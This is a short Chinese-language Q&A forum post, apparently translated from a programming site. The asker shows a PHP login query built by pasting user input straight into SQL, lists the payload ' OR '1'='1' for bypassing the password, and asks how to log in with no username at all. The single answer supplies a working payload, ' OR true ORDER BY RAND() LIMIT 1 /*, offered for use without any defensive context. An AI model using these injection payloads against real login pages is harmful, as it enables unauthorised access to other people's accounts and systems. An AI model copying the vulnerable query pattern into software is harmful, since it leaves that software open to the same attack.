我有一个用PHP编写的非常基本的登录页面代码的一部分,我想要绕过没有任何登录。
$req="select id from USERS where login='$login' and pwd='$pass'";
$result = mysql_query($req);
如果我有一个用户的登录名,例如login1已经在数据库中。我只需要输入以下条目即可在不知道密码的情况下登录;我们称之为SQL注入:
login="login1"
password="' OR '1'='1'"
但是,我不知道如何在没有任何登录名或密码的情况下登录页面。
提前谢谢!
答案 0 :(得分:0)
适用于login="' OR true ORDER BY RAND() LIMIT 1 /*"